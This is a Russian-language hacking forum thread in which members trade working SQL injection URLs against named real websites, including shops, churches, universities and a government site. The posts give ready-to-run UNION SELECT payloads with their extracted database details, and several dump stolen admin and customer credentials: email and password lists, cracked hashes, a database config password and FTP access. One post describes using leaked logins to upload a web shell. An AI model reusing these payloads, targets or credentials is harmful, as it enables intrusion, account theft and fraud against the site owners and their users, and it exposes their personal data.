SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Для Военный , молодой человек..никогда не сдавайся
    1.http://www.usadba.ru/city/flat/5481/?-1+order+by+5--

    version()- 5.0.67
    user() - [email protected]
    database()-base_usadba


    слепая скуля...поможет нам СИПТ небезизвестный... посимвольный брут и вуаля

    с 1-16 стандартные таблички... а дальшe

    Getted String number 17:a_flats

    Getted String number 18:a_flats_arenda

    Getted String number 19:a_houses

    Getted String number 20:b_dormitory_arenda

    Getted String number 21:drm_s_highway

    Getted String number 22:l_house_area

    Getted String number 23:l_house_informal

    Getted String number 24:mmedia_city

    Getted String number 25:mmedia_drm

    Getted String number 26:mmedia_house

    ну я думаю понятно...ковыряй дальше сам.... удачи
     
  2. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Code:
    http://heyyou.ru/?page=proooblogs&id=-1+union+select+1,2,3,version(),5,6,7,8,9--
     
    3 people like this.
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.ypr.org.au/view_history.php?historyID=-6'+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION())/*
    [b]User:[/b] ypr@localhost
    [b]Database:[/b] ypr_org_au
    [b]Version:[/b] 4.1.20
    
    http://www.nihonjujutsu.com/history.php?HistoryID=-7+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
    [b]User:[/b] jujutsu@localhost
    [b]Database:[/b] jujutsu
    [b]Version:[/b] 5.0.32-Debian_7etch8-log
    
    http://www.onegi.com.tw/AboutOneGi/History_Content.php?HistoryID=-2+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20--
    [b]User:[/b] onegi@localhost
    [b]Database:[/b] onegi
    [b]Version:[/b] 5.1.30-community
    
    http://www.xinanchem.com/historyxiangxi.php?historyId=-143+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5/*
    [b]User:[/b] root@localhost
    [b]Database:[/b] wynca2
    [b]Version:[/b] 4.0.13-nt
    
    http://www.wynca.com/en/historyxiangxi.php?historyId=-110+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5/*
    [b]User:[/b] root@localhost
    [b]Database:[/b] wynca2 
    [b]Version:[/b] 4.0.13-nt
    
    http://www.welltec.com.hk/news_see.php?thisid=-18+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
    [b]User:[/b] root@localhost 
    [b]Database:[/b] welltec_com_hk 
    [b]Version:[/b] 5.0.26-community-nt
    
    http://www.salmonsupporters.com/detailsupporters.php?thisid=-32+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10,11,12/*
    [b]User:[/b] [email protected]
    [b]Database:[/b] wssDBadmin
    [b]Version:[/b] 4.1.22-max-log
    
    http://www.lyrics.nl/showsong.php?songid=28151&artiestid=552&historyid=-12632+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3/*
    [b]User:[/b] filmenmu@localhost
    [b]Database:[/b] filmenmu
    [b]Version:[/b] 4.1.22
    
    http://www.cosmos-ml.com/en/news_see.php?thisid=-1+UNION+SELECT+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
    [b]User:[/b] root@localhost
    [b]Database:[/b] dg_cosmos
    [b]Version:[/b] 5.0.26-community-nt
    
    http://www.orcaschurch.org/Church_Notes.php?thisID=-28+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5%20--
    [b]User:[/b] orcaschurch@localhost
    [b]Database:[/b] orcaschurch
    [b]Version:[/b] 5.0.58
    
    http://www.gvchristian.com/videopopup.php?thisid=307+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10/*
    [b]User:[/b] root@localhost
    [b][b]Database:[/b]/b] fatguys_gvcc
    [b]Version:[/b] 5.0.45-Debian_1ubuntu3-log
    Это за вчера =). Мои скули. Крутите...
     
    1 person likes this.
  4. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    dofp_ab@localhost
    4.1.22-standard
    dofp_db

    Database Version: 5.0.46-enterprise-gpl-log
    Database name: espin_dbo
    User name: [email protected]

    PageRank 7

    Database Version: 5.0.32-Debian_7etch5-log
    Database name: poetry
    User name: [email protected]

    User:[email protected]
    Version:5.0.67-log
    Database:carbonrecords


    Ну и законченный магазинчик на вкусное -)

    http://www.europanet.com.br/site/index.php?cat_id=32&pag_id=-13673+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,version(),45,46,47,48,49,50,51,52,53,54,55--


    Database Version: 5.0.18-log
    Database name: europanet
    User name: arima@localhost

    В общем там 38 Баз для всех пойдет и спам и аси кард итд...


    Getting Data from table loja_admin (11 Rows) from database eurobest_commerce
    Fields id_admin:usuario:senha:superadmin

    [4]:9:carmina:5268582b6eaed9fee8a2658b4f57707a:0
    [5]:10:luiz:ebea0b104bf6f36f1eb2ddc931d666ea:1
    [6]:11:internet:b7b791e873f143d5318310e59022175d:1
    [7]:12:claudia:5268582b6eaed9fee8a2658b4f57707a:0
    [8]:13:joana:0ffbdca648adb61d5535ff063e70cb3f:1 пароль amidala
    [9]:14:licia:63c193707ac085b2f8dd3115f546d6ed:0



    Fields usuario:senha:admin_cat:admin_ftp

    [1]:crnarciso:317a77f27ecd0390:0:
    [2]:siqueira:0f1209ee38606424:0:
    [3]:joice:0e9df198295e5bc8:0: Пароль joice
    [4]:erick:350ef7027f408372:0:
    [5]:ivan:323ef54f34efa5cb:4: Пароль 120585
    [6]:diogo:081c619177dbefa1:0:
    [7]:expedicao:6acea1340bfcbf5e:13:
    [8]:manu:5210fdc242391e30:575:
    [9]:livia:0ce5dd0f706534ab:600: Пароль fotografe
    [10]:humberto:6460f98b14d0ae2e:572:/animeinvaders/
    [11]:rodolfo:4151a9df6c9924ac:617:/motomax/
    [12]:mariofit:136940302c5235c7:617: Пароль ducati
    [13]:chris:2d2643c419314e1b:430:/sucesso/
    [14]:gameblog:36dda20c5784bd81:825:
    [15]:luiz:36dda20c5784bd81:832:/gameblog/
    [16]:nelson:36dda20c5784bd81:834:/gameblog/
    [17]:leandro:36dda20c5784bd81:831:/gameblog/
    [18]:julebas:36dda20c5784bd81:830:/gameblog/
    [19]:fhazevedo:36dda20c5784bd81:828:/gameblog/
    [20]:sombrates:36dda20c5784bd81:835:/gameblog/
    [21]:trivella:36dda20c5784bd81:836:/gameblog/
    [22]:humberto_gb:36dda20c5784bd81:829:/gameblog/
    [23]:aida:449a67e9524397b5:2:/natureza/ Пароль plantas
    [24]:junior:63a09b66402d69ac:977:/xbox/
    [25]:marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4:portugal FTP 200.229.132.34:21
    [26]:adriano:44d383005b181d39:35: Пароль marley
    [27]:luciane:26ae382f4d7de2e9:375:/sucesso/ Пароль lembrar
    [28]:humbertoblog:36dda20c5784bd81:829:
    [29]:flavia:36dda20c5784bd81:971:/gameblog/
    [30]:gustavo:36dda20c5784bd81:970:/gameblog/

    В общем самое важное было это залить шел..
    Прошел в админку через тело

    marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4:portugal FTP 200.229.132.34:21

    Ну и спокойно залил.
    Далее раскопал конфиг там важная персона

    // Database username
    $phpAds_config['dbuser'] = 'arima';

    // Database password
    $phpAds_config['dbpassword'] = 'spectroman21';

    Доступ ко всем базам!

    save mode отключен -)

    Наслаждайтесь.


    PostgreSQL 7.2.7 on i686-pc-linux-gnu, compiled by GCC 2.96

    http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,version()--&r=/list.php

    http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,TABLENAME/**/from/**/PG_TABLES+LIMIT+1,1--&r=/list.php

    itemimages
    CATEGORIES
    items
    pg_aggregate
    pg_am
    pg_amop
    pg_amproc
    pg_attrdef
    pg_attribute
    pg_xactlock
    pg_type
    pg_trigger
    pg_statistic
    pg_shadow
    pg_rewrite
    pg_relcheck
    pg_proc
    pg_operator
    pg_opclass
    pg_listener
    pg_largeobject
    pg_language
    pg_inherits
    pg_index
    pg_group
    pg_description
    pg_database
    pg_class

    Дальше не могу может кто сможет....




    DATAMP - Directory of American Tool and Machinery Patents

    http://www.datamp.org/displayPatent.php?id=809809809809837107+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--&pn=15

    Database Version: 5.0.67-community-nt
    Database name: datamp
    User name: datamp_owner@localhost





    http://www.datamp.org/displayPatent.php?id=809809809809837107+UNION+SELECT+1,2,3,4,5,CONCAT((SELECT+CONCAT(steward_id,username,password,name,email)+FROM+datamp.data_stewards+LIMIT+19,1)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--



    [1]:2:rbrendler:513eb98aea47a672a8f3536970b958fe:Ralph Brendler:[email protected]
    [2]:3:jjoslin:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff Joslin:[email protected]
    [3]:4:blpenn:a16aa06b2f0474f3a361be2bfadb9070:Brian Pennington:[email protected]
    [4]:5:sreynolds:d41d8cd98f00b204e9800998ecf8427e:Steve Reynolds:[email protected]
    [5]:6:groberts:7db90444501f73dbb69c90ce7abdc329:Gary Roberts:[email protected]
    [6]:7:khays:eb416ed484bb765f198c8f43d95ccee8:Kirk Hays:[email protected]
    [7]:8:cswingle:d41d8cd98f00b204e9800998ecf8427e:Chris Swingley:[email protected]
    [8]:9:jmcvey:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff McVey:[email protected]
    [9]:11:datchuck:61bc4419f39a648db27277c551367a5a:Jim Erdman:[email protected]
    [10]:13:cmatthews:1697d46fbd40f5fb68babd2776fd9d0a:Carl Matthews:[email protected]
    [11]:14:dmcconnell:c4ce0603e30080fa5f54e59a94d7921f:Don McConnell:[email protected]
    [12]:15:rallen:5c40e218bd15cc65899c3ab8905c4656:Russ Allen:[email protected]
    [13]:16:sschulz:d44c2e495958b2062ae1049b20b4aa35:Stan Schulz:[email protected]
    [14]:17:motllahsram:5abf97a52e1d08577d1294d9a46d0988:Tom Marshall:[email protected]
    [15]:18:joelr:ca3df0a222b067dbce8712a979bc9145:Joel Havens:[email protected]
    [16]:19:murness:c6dafa4f1768d773a4a877f663b59629:Mike Urness:[email protected]
    [17]:20:tpobrienjr:dc787b140dc4fc95ec5fd3ee4e361c6d:Tom O'Brien:[email protected]
    [18]:21:mwoodard:e15c0f3c29d61392357cbf71c9486e26:Mark Woodard:[email protected]
    [19]:23:mconley:7ac80e96ae9183e4f5811924f0606203:Mark Conley:[email protected]


    Понравился вот этот ящик -) [email protected]
     
    #7464 spherics, 20 Jan 2009
    Last edited: 21 Jan 2009
    2 people like this.
  5. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    интернет магазин аксессуаров и подарков
    табла с паролями и мылами
    Code:
    http://eluxus.com.ua/catalog/index.php?_a=view&_cat=-73 UNION SELECT 1,2,concat_ws(char(58),email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM useraccounts --
    админка
    http://eluxus.com.ua/admin/
    кто админ незнаю, ройте =)

    магазин топмобила

    Code:
    http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14 --
    version::5.0.67-community
    user::shmel_admin@localhost
    database::shmel_mobiles
    Вывод всех таблиц
    Code:
    http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13,14 FROM INFORMATION_SCHEMA.TABLES --
    какой то Белорусский чат
    Code:
    http://www.irc.by/modules/articles/article.php?id=-16 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,USER(),DATABASE(),VERSION()),8,9,10,11,12,13,14,15,16,17,18,19,20 --
    version::4.1.25
    User::ircby_xoops@localhost
    database::ircby_xoops

    интернет бутик для женщин
    Code:
    http://all-perfumes.com.ua/index.php?act=cat&id=-66 UNION SELECT concat_ws(0x3a,USER(),DATABASE(),VERSION()),2,3,4,5 --
    version::4.1.12-standard-log
    user::drnova_dnj0Pw3@localhost
    database::drnova_apP4n1c7
     
    #7465 TELO, 21 Jan 2009
    Last edited: 21 Jan 2009
    1 person likes this.
  6. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Магазинчик -)


    Database Version: 5.0.67-community-log
    Database name: zoomacti_products
    User name: zoomacti_dare2li@localhost


    Fields email:password

    [1]:D[email protected] :ghijkl
    [2]:[email protected] :lackluster
    [3]:[email protected] :ghijkl
    [4]:[email protected] :mydol
    [5]:[email protected] :markizen
    [6]:[email protected] :d2ljunik
    [7]:[email protected] :buster1
    [8]:[email protected] :edel9889
    [9]:p[email protected] :turbo
    [10]:[email protected] :bruin85
    [11]:[email protected] :ila105bs
    [12]:[email protected] :marketing
    [13]:[email protected] :dissert
    [14]:[email protected] :bosscake
    [15]:[email protected] :qqqqqqqqqq
    [16]:[email protected] :ddddd
    [17]:[email protected] :aa
    [18]:[email protected] :987
    [19]:[email protected] :ggggg

    Итд...


    И еще один магазинчик


    Database Version: 5.0.45
    Database name: jfa
    User name: jfa@localhost

     
    #7466 spherics, 21 Jan 2009
    Last edited: 21 Jan 2009
    1 person likes this.
  7. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.ambisousa.pt/php/inserir_comentario.php?id=-1+union+select+1,2,3,4,login,passwd+from+users--


    http://www.ambisousa.pt/admin/


    login:ambisousa
    pass:sousinha

    Куяк!!!
     
    1 person likes this.
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://sim-cat.com/cats.php?sex=-0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&lang=eng
    
    4.0.27-max-log

    Code:
    http://www.stylecat.ru/cats.php?sex=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29--&breed=kbo&lang=rus

    5.0.51a-log 2
     
    _________________________
    1 person likes this.
  9. Maestus

    Maestus Member

    Joined:
    19 Jan 2009
    Messages:
    8
    Likes Received:
    14
    Reputations:
    3
    The Winston Churchill Memorial Trust

    Ниже представленный запрос такого вида, из-за отсутствия иного выхода по причине следующей ошибки:
    Fatal error: Database error #1267: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
    возникшая, к примеру, при функциях user(), database(),version(). А поля таблиц проходят без проблем.

    database():churchilltrust
    user():winston@localhost


    Code:
    http://www.churchilltrust.com.au/news.php?id=-2+union+select+1,password,3,username,5,6+from+users/*
    username:admin
    password:4dm1n
     
    4 people like this.
  10. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    магазин подарков
    Code:
    http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14,15%20%20--
    version::4.1.22
    user::u_chudesa@localhost
    database::chudesa
    в табле users были следующие персоны:
    login:test login:vika
    passwors:123 password:pjhbr
    Code:
    http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,login,pass,5,6,7,8,9,10,11,12,13,14,15%20from%20users%20limit%200,1%20--
    ещё один магазин подарков
    Code:
    http://www.podarunky.kiev.ua/showpage.php?id=9999999%20UNION%20SELECT%201,2,3,c oncat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7%2 0%20--
    version::4.1.22-log
    user::sitemaker@localhost
    database::giftBase

    Магазин медикаментов MEDIMAG
    Code:
    http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x3a,USER(),DATABASE(),VERSION()),10,11,12,13,14,15,16,17,18,19,20%20--
    version::4.1.22
    user::u_medimag_ap@localhost
    database::medimag_apteka

    табла с паролями
    Code:
    http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,login,password,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20--
    login::admin
    password::shutnick

    Вход в админку через сайт, можно реально оформить заказ и подтвердить его.

    Книжный магазин
    Code:
    http://market.factor.ua/books.php?book_id=-811%20UNION%20SELECT%201,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20--
    version::4.1.20
    user::market@localhost
    database::market
     
    #7470 TELO, 22 Jan 2009
    Last edited by a moderator: 22 Jan 2009
    2 people like this.
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    PR7 webUser@localhost:5.0.27-community-nt-log:rc-web
     
    1 person likes this.
  12. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    version: 5.0.22
     
  13. Maestus

    Maestus Member

    Joined:
    19 Jan 2009
    Messages:
    8
    Likes Received:
    14
    Reputations:
    3
    Unitech

    user:[email protected]
    database:uniroot
    version:4.1.22-max-log

    http://unitech.com.az/admin/
    username:uni
    password:777
     
  14. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    http://www.uztest.ru
    на сайте имеется база данных на более чем 7,5 тыс учителей=))
    db - uztest3_temp
    version - 5.0.51a
    user - uztest3_temp@localhost
    админка - login: oldteacher pass:591121
    админка форума - login:admin pass:goldfire757
    P.s все пароли выводяться в не зашифрованном виде=)))
     
    2 people like this.
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.valitsus.ee/index.php?rep_id=294943&tpl=1007%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&external=&search=&aasta=

    Таблички:
    admin,config,tbl,version

    http://www.valitsus.ee/brf/admin

    Доступ закрыт по айпи,если не ошибаюсь в очередной раз =______________=
     
  16. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    Сайт турнира по программированию=) http://www.icl.ru
    админка - pass:wordplay login: pupucya
    пароли админов зашифрованы в MYSQL-4.x-Hash
    вывод информации с пользователями:
    пароли пользователей в незашифрованном виде ;-)
    бд- turnir;
    версия бд - 5.0.15-nt
    юзер - [email protected]
     
  17. crystalbit

    crystalbit Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    212
    Likes Received:
    88
    Reputations:
    8
    Code:
    http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13--
    http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=0x7070656c626132325f666f746f--
    Code:
    http://www.inta.gatech.edu/faculty-staff/listing.php?uID=-20+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19--
    Code:
    http://dms.dartmouth.edu/faculty/facultydb/view.php?uid=-139+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--
    Code:
    таблицы: biblio,facultydb,profile,users
    колонки(users): uid,name,add_perm,edit_perm,delete_perm,superuser
    колонки(profile): id,facultydb_id,cv_filename,dv,bio_filename,bio
    колонки(facultydb): uid,Personal_ID,status,Name_DND,Name_First,Name_Middle,Name_Last,Name_Prefix,Name_Suffix,Position_Title,Birth_Date,Department,Degree,Education,Interests,Programs,Courses,Grant_Support,Core_Facilities,URL,Telephone_Number,Facsimile_Number,Email_Address,Office,Assistant,Asst_Telephone,Asst_Email,Address1,Address2,Address3,City,State,Zip_Code
    колонки(biblio): Title,Authors,Source,PMID,Medline_AN,id,uid
     
    #7477 crystalbit, 23 Jan 2009
    Last edited by a moderator: 23 Jan 2009
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    uncga@localhost:4.1.20-log:uncga
     
  19. _evgeniy_

    _evgeniy_ Member

    Joined:
    7 Sep 2008
    Messages:
    25
    Likes Received:
    11
    Reputations:
    5
    Code:
    http://market-doors.ru/show_cat2.php?grid=-5+union+select+concat_ws(0x3a,username,password)+FROM+admin
    
    [email protected]
    5.0.67-log
    u55818

    admin:588eb5181b3ba704
    http://market-doors.ru/admin.php

    Code:
    http://www.kubanjob.ru/vacanc.php?id=-15948+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20
    
    Uwww2727S@localhost
    4.1.21-log
    udb2727

    Code:
    http://arendyi.ru/detail.php?de=-2362+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11
    
    [email protected]
    5.0.67-log
    u8766_arendyi

    http://www.arendyi.ru/login.php

    Ольга:11111,
    Ольга:777,
    Ольга:222222,
    Ольга:jkmuf,
    Рая:2332

    Code:
    http://allookna.ru/?page=-19+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11
    [email protected]
    5.0.67-log
    u52548

    admin:fkkjadmin
    http://allookna.ru/admin/

    Code:
    http://shark63.ru/index.php?cat=-3+union+select+concat_ws(0x3a,user(),version(),database()),2--&subcat=0&det=0
    [email protected]
    5.0.67-log
    u57848

    - logins
    shark:dZral

    - logins_base
    shark:dZral,avtorental:sc56Rnt,hertz:hop42gDr,shark:ro6tSf35,avtorental:HQr57tu,hertz:htf47gH

    - logins_buh_flagman
    shark:dZral,shark:sdf7A

    - logins_buh_ssp
    shark:dZral,shark:sdf7A

    http://shark63.ru/buh_shark
    http://shark63.ru/buh_flagman
    http://shark63.ru/buh_ssp
    http://shark63.ru/base
    http://shark63.ru/client

    Code:
    http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,user(),version(),database())--
    
    [email protected]
    5.0.67-log
    u64338

    Code:
    http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,name,pass)+FROM+users--
    
    admin:1

    http://www.tetevent.ru/admin/
     
  20. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Berkeley.edu PR 9
    5 ветка.. но нифига (
     
    3 people like this.
Thread Status:
Not open for further replies.